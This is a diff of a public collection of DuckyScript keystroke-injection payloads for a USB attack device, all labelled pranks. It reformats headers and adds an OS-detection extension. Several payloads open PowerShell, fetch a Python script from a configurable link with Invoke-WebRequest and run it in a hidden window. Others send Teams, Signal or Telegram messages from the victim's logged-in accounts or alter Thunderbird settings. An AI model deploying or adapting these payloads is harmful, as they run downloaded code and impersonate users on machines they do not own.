REM # Title : Continuos Print In Terminal | # #
REM # Author : Aleff | # Title : Continuos Print In Terminal #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Prank #
REM # | # Target : Windows 10/11 #
REM #################################################### # #
####################################################
Plug And Play <3
REM Plug And Play <3 Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM Requirements: EXTENSION PASSIVE_WINDOWS_DETECT
REM - Internet Connection REM VERSION 1.1
REM - ExecutionPolicy Bypass REM AUTHOR: Korben
REM - Python
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 2000 DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}") STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")

83
payloads/library/prank/Full-ScreenBannerJoke/payload.txt
View File

@ -1,36 +1,73 @@
REM_BLOCK
REM ############################################ ############################################
REM # | # #
REM # Title : Full-Screen Banner Joke | # Title : Full-Screen Banner Joke #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Prank | # Category : Prank #
REM # Target : Windows 10-11 | # Target : Windows 10-11 #
REM # | # #
REM ############################################ ############################################
REM Requirements: Requirements:
REM - Internet Connection - Internet Connection
REM - Python installed - Python installed
REM - ExecutionPolicy Bypass - ExecutionPolicy Bypass
END_REM
REM REQUIRED - Set your Python script link REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 500 DELAY 500
STRING Invoke-WebRequest -Uri " STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 500 DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

81
payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
View File

@ -1,29 +1,69 @@
REM ################################################## REM_BLOCK
REM # | ##################################################
REM # Title : Play A Song Through Spotify | # #
REM # Author : Aleff | # Title : Play A Song Through Spotify #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Prank #
REM # | # Target : Windows 10-11 #
REM ################################################## # #
##################################################
REM Requirements:
REM - Internet Connection
REM - Spotify installed and user logged-in
REM - ExecutionPolicy Bypass
Requirements:
- Internet Connection
- Spotify installed and user logged-in
- ExecutionPolicy Bypass
END_REM
REM REQUIRED - Set your song name REM REQUIRED - Set your song name
DEFINE SONG-NAME example DEFINE #SONG-NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING powershell STRINGLN powershell
ENTER
DELAY 2000 DELAY 2000
STRINGLN Start-Process "spotify://" STRINGLN Start-Process "spotify://"
@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE REM ESCAPE
REM DELAY 500 REM DELAY 500
STRING SONG-NAME STRINGLN #SONG-NAME
ENTER
DELAY 1000 DELAY 1000
TAB TAB
DELAY 500 DELAY 500

26
payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
View File

@ -1,12 +1,14 @@
REM ##################################################### REM_BLOCK
REM # # #####################################################
REM # Title : Prank In The Middle - Thunderbird # # #
REM # Author : Aleff # # Title : Prank In The Middle - Thunderbird #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : Prank # # Version : 1.0 #
REM # Target : Windows 10/11 # # Category : Prank #
REM # # # Target : Windows 10/11 #
REM ##################################################### # #
#####################################################
END_REM
EXTENSION DETECT_READY EXTENSION DETECT_READY
REM VERSION 1.1 REM VERSION 1.1
@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings REM Open Thunderbird and goto settings
GUI r GUI r
STRING thunderbird STRINGLN thunderbird
ENTER
DELAY 1000 DELAY 1000
REPEAT 4 TAB REPEAT 4 TAB
ENTER ENTER
@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory REM Open the powershell and goto the directory
GUI r GUI r
STRING powershell STRINGLN powershell
ENTER
DELAY 1500 DELAY 1500
STRING cd STRING cd
DELAY 500 DELAY 500

107
payloads/library/prank/SendMessagesInTeams/payload.txt
View File

@ -1,37 +1,82 @@
REM ########################################### REM_BLOCK
REM # | ###########################################
REM # Title : Send Messages In Teams | # #
REM # Author : Aleff | # Title : Send Messages In Teams #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Prank #
REM # | # Target : Windows 10-11 #
REM ########################################### # #
###########################################
REM Requirements: Requirements:
REM - Microsoft Teams installed and user logged-in - Microsoft Teams installed and user logged-in
REM - Internet Connection - Internet Connection
REM - ExecutionPolicy Bypass - ExecutionPolicy Bypass
REM - Python - Python
REM 1. Open a powershell 1. Open a powershell
REM 2. Close if Teams is opens and reopen it 2. Close if Teams is opens and reopen it
REM 3. Goto search bar 3. Goto search bar
REM 4. Search the person by name, email, id or what you want... 4. Search the person by name, email, id or what you want...
REM 5. Downarrow and enter to open the chat 5. Downarrow and enter to open the chat
END_REM
REM REQUIRED - Name, email, id or what you want for contact the target REM REQUIRED - Name, email, id or what you want for contact the target
DEFINE USER-ID example DEFINE #USER-ID example
REM REQUIRED - Messages
DEFINE MESSAGE1 example REM REQUIRED - Messages
REM ... DEFINE #MESSAGE1 example
REM DEFINE MESSAGEN example..
REM ...
REM DEFINE #MESSAGEN example..
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING powershell STRINGLN powershell
ENTER
DELAY 2000 DELAY 2000
REM #### Powershell #### REM #### Powershell ####
@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams #### REM #### Teams ####
CTRL N CTRL N
DELAY 2000 DELAY 2000
STRING USER-ID STRINGLN #USER-ID
ENTER
DELAY 2000 DELAY 2000
TAB TAB
DELAY 1000 DELAY 1000
@ -53,11 +97,10 @@ TAB
DELAY 1000 DELAY 1000
REM #### Messages #### REM #### Messages ####
STRING MESSAGE1 STRINGLN #MESSAGE1
ENTER
DELAY 1000 DELAY 1000
REM ... REM ...
REM STRINGLN MESSAGEN REM STRINGLN #MESSAGEN
DELAY 500 DELAY 500
ALT F4 ALT F4

91
payloads/library/prank/SendSignalMessages/payload.txt
View File

@ -1,41 +1,83 @@
REM ######################################### REM_BLOCK
REM # | #########################################
REM # Title : Send Signal Messages | # #
REM # Author : Aleff | # Title : Send Signal Messages #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank, Execution | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Prank, Execution #
REM # | # Target : Windows 10-11 #
REM ######################################### # #
#########################################
REM Requirements: Requirements:
REM - Internet Connection - Internet Connection
REM - Signal App installed - Signal App installed
REM Payload Plug-And-Play but can be edited as you want the message Payload Plug-And-Play but can be edited as you want the message
END_REM
REM REQUIRED - Receiver number REM REQUIRED - Receiver number
DEFINE NUMBER 3332211000 DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send REM REQUIRED - Message to send
DEFINE MESSAGE YOUR_MESSAGE DEFINE #MESSAGE example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 500 DELAY 500
STRING Stop-Process -Name "Signal" STRINGLN Stop-Process -Name "Signal"
ENTER DELAY 500
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
ENTER
DELAY 5000 DELAY 5000
TAB TAB
TAB TAB
TAB TAB
ENTER ENTER
DELAY 100 DELAY 100
STRING NUMBER STRING #NUMBER
DELAY 100 DELAY 100
TAB TAB
DELAY 100 DELAY 100
@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent. REM This is the message that will be sent.
REM You can change it as you want, if you want. REM You can change it as you want, if you want.
STRING YOUR_MESSAGE STRINGLN #MESSAGE
ENTER
REM Closing Signal App REM Closing Signal App
DELAY 500 DELAY 500

73
payloads/library/prank/SendTelegramMessages_Linux/payload.txt
View File

@ -1,37 +1,64 @@
REM_BLOCK
#########################################
# #
# Title : Send Telegram Messages #
# Author : Aleff #
# Version : 1.1 #
# Category : Prank #
# Target : Linux #
# #
#########################################
REM ######################################### Requirements:
REM # | - Internet Connection
REM # Title : Send Telegram Messages | - telegram-desktop installed and activated
REM # Author : Aleff | END_REM
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux |
REM # |
REM #########################################
REM Requirements: REM Define the message receiver username
REM - Internet Connection DEFINE #USERNAME @example
REM - telegram-desktop installed and activated
REM Define the message(s)
DEFINE #MESSAGE1 example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
STRING telegram-desktop STRINGLN telegram-desktop
ENTER
REM It depends by the computer... REM It depends by the computer...
DELAY 3000 DELAY 3000
REM Define the message receiver username STRINGLN #USERNAME
DEFINE USERNAME @example
STRING USERNAME
ENTER
DELAY 500 DELAY 500
REM Define the message(s) STRINGLN #MESSAGE1
DEFINE MESSAGE1 example
STRING MESSAGE1
ENTER
DELAY 500 DELAY 500
REM other messages here... REM other messages here...
REM ... REM ...

79
payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
View File

@ -1,33 +1,70 @@
REM ############################################ REM_BLOCK
REM # | ############################################
REM # Title : The Mouse Moves By Itself | # #
REM # Author : Aleff | # Title : The Mouse Moves By Itself #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Prank #
REM # | # Target : Windows 10/11 #
REM ############################################ # #
############################################
REM Requirements:
REM - Internet Connection
Requirements:
- Internet Connection
END_REM
REM REQUIRED - Set your Python script link REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 500 DELAY 500
STRING Invoke-WebRequest -Uri " STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 500 DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

25
payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
View File

@ -1,15 +1,18 @@
REM ############################################################ REM_BLOCK
REM # # ############################################################
REM # Title : This damn shell doesn't work, SO SAD! :C # # #
REM # Author : Aleff # # Title : This damn shell doesn't work, SO SAD! :C #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : Prank # # Version : 1.0 #
REM # Target : Linux # # Category : Prank #
REM # # # Target : Linux #
REM ############################################################ # #
############################################################
Requirements:
- Nothing <3
END_REM
REM Requirements:
REM - Nothing <3
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution. REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE DEFINE #TARGET_KALI_LINUX TRUE

31
payloads/library/prank/Try_To_Catch_Me/payload.txt
View File

@ -1,27 +1,26 @@
REM #################################### REM_BLOCK
REM # | ####################################
REM # Title : Try To Catch Me | # #
REM # Author : Aleff | # Title : Try To Catch Me #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Prank #
REM # | # Target : Windows 10/11 #
REM #################################### # #
####################################
Requirements:
REM Requirements: - Python
REM - Python - Internet Connection
REM - Internet Connection END_REM
REM REQUIRED - Set your Python script link REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com DEFINE #SCRIPT-PY-LINK example.com
DELAY 1000 DELAY 1000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 500 DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py" STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"